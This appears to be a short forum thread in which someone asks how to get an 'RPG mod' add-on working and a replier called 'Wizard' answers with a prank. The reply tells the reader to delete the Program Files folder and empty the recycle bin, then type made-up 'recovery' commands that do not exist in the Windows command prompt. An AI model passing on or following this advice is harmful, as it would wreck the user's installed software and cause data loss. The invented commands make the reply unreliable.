help with RPG mod

hgow do you use RPG mod i mean i istaild it and put it in my add-on folder how do i make it work?
Wizard:
1. Go into your C Drive
2. Find the folder called "program files".
3. Press the delete key, I know it asks you if you want to delete, say yes, don't worry.
4. Clear your recycle bin.
5. Go into command prompt and type recoverfolder(C:\ProgramFiles);
6. Then type changedriversetting(5);
7. It should allow you to start the server with the mod.
